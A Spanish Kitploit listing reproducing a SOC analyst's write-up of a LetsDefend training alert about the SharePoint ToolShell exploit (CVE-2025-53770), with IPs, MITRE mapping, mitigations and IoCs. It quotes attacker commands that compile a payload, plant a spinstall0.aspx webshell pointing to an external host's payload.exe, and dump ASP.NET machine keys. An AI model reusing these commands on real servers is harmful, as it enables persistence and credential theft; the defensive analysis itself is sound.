Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Una actividad para entrenar habilidades de análisis e informes | Kitploit
Herramientas/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAnálisis ForenseInteligencia de AmenazasAprendizaje y EducaciónRespuesta a IncidentesLabs y Práctica
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Una actividad para entrenar habilidades de análisis e informes

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SOC342---CVE-2025-53770-SharePoint-ToolShell-Bypass-de-Autenticación-y-RCE

Esta es una investigación realizada en la plataforma Let's Defend, basada en un CVE reciente de SharePoint. Echemos un vistazo.

Imagen 2025-07-27 162109
  1. Examine el nombre de la regla. Los nombres de las reglas suelen crearse específicamente para el ataque que se desea detectar. Al examinar el nombre de la regla, puede entender qué ataque está enfrentando.

La regla SOC342 detectó una solicitud POST no autenticada dirigida a la página vulnerable ToolPane.aspx, que presenta:

un payload grande (Content-Length: 7699)

un referer sospechoso (SignOut.aspx) probablemente usado para ofuscar el origen

comportamiento consistente con la explotación de la vulnerabilidad ToolShell

  1. Detecte entre qué dos dispositivos se está produciendo el tráfico.

Un usuario externo (IP: 107.191.58.76) envió una solicitud manipulada a un servidor SharePoint interno (172.16.20.17).

Analice el registro de nuestro endpoint

2

Un proceso w3wp.exe ejecutando un comando PowerShell codificado puede indicar una posible actividad de explotación o post-explotación (por ejemplo, ejecución de un payload oculto).

En un entorno de SharePoint, es importante verificar si este comportamiento es esperado o si representa un abuso.

El comando ha sido ofuscado usando base64

Imagen 2025-07-27 163800

Este payload permite al atacante extraer e imprimir claves críticas de configuración ASP.NET de la máquina en la que se ejecuta.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Compila un ejecutable a partir del código fuente C# en el servidor.

Crea una puerta trasera web (archivo ASPX malicioso) en la ruta de SharePoint, que al ser visitada permite ejecutar o descargar un payload externo.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Este comando crea un archivo llamado spinstall0.aspx en la carpeta LAYOUTS de SharePoint y escribe el contenido en él (aquí es un marcador de posición que representa el código de una webshell)

Este es el hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Echemos un vistazo en VirusTotal.

Imagen 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Este comando permite al atacante acceder a la configuración de aplicación de MachineKeySection, que puede exponer claves criptográficas sensibles como la clave de validación y la clave de descifrado.

Estas claves son críticas para la seguridad de ASP.NET, protegiendo cosas como cookies de autenticación y ViewState.

Exponer o recuperar estas claves puede permitir a los atacantes falsificar tokens de autenticación, descifrar datos protegidos o realizar otros ataques contra la aplicación web.

MITRE ATT&CK

mitre

Nota del analista:

La alerta se generó debido a una actividad inusual de PowerShell observada en un servidor SharePoint, que posteriormente se determinó como un intento de explotación dirigido a CVE-2025-53770. El atacante inicialmente dejó y compiló un ejecutable C# personalizado (payload.exe) usando el compilador C# (csc.exe), luego creó una webshell ASPX maliciosa (spinstall0.aspx) dentro de un directorio de SharePoint accesible web. Posteriormente, se ejecutó un comando de PowerShell para recuperar claves criptográficas sensibles de la máquina de la configuración del servidor a través de la reflexión de .NET. Esta secuencia de acciones sugiere un ataque de múltiples fases diseñado para mantener un control persistente y posiblemente falsificar tokens de autenticación. La webshell fue verificada como maliciosa con una tasa de detección de VirusTotal de 39/62. El incidente se confirma como un verdadero positivo, y se recomiendan medidas adicionales de contención y remediación.

Imagen 2025-07-27 170751

Detalle de CVE-2025-53770

La deserialización de datos no confiables en Microsoft SharePoint Server local permite que un atacante no autorizado ejecute código a través de una red. Microsoft tiene conocimiento de que existe un exploit para CVE-2025-53770 en la naturaleza. Microsoft está preparando y probando completamente una actualización integral para abordar esta vulnerabilidad. Mientras tanto, asegúrese de que la mitigación proporcionada en esta documentación de CVE esté implementada para estar protegido contra la explotación.

Imagen 2025-07-27 171020

Mitigación sugerida por Microsoft:

  1. Utilice versiones compatibles de SharePoint Server local

  2. Aplique las últimas actualizaciones de seguridad enlazadas arriba.

  3. Implemente la protección de Microsoft Defender para Endpoint, o soluciones de amenazas equivalentes

  4. Asegúrese de que la Interfaz de Escaneo Antimalware (AMSI) esté activada y configurada correctamente, con una solución antivirus adecuada como Defender Antivirus

  5. Rote las claves de máquina ASP.NET del servidor SharePoint

IoC

Spinstall0.aspx Web shell utilizada por actores de amenazas

Los actores también han modificado el nombre del archivo de varias maneras, como spinstall.aspx, spinstall1.aspx, spinstall2.aspx

Este informe se basa en una actividad realizada en la plataforma Let's Defend. Todos los hallazgos y materiales presentados son solo con fines educativos. Todos los derechos y propiedad pertenecen a Let's Defend.

Descargar herramienta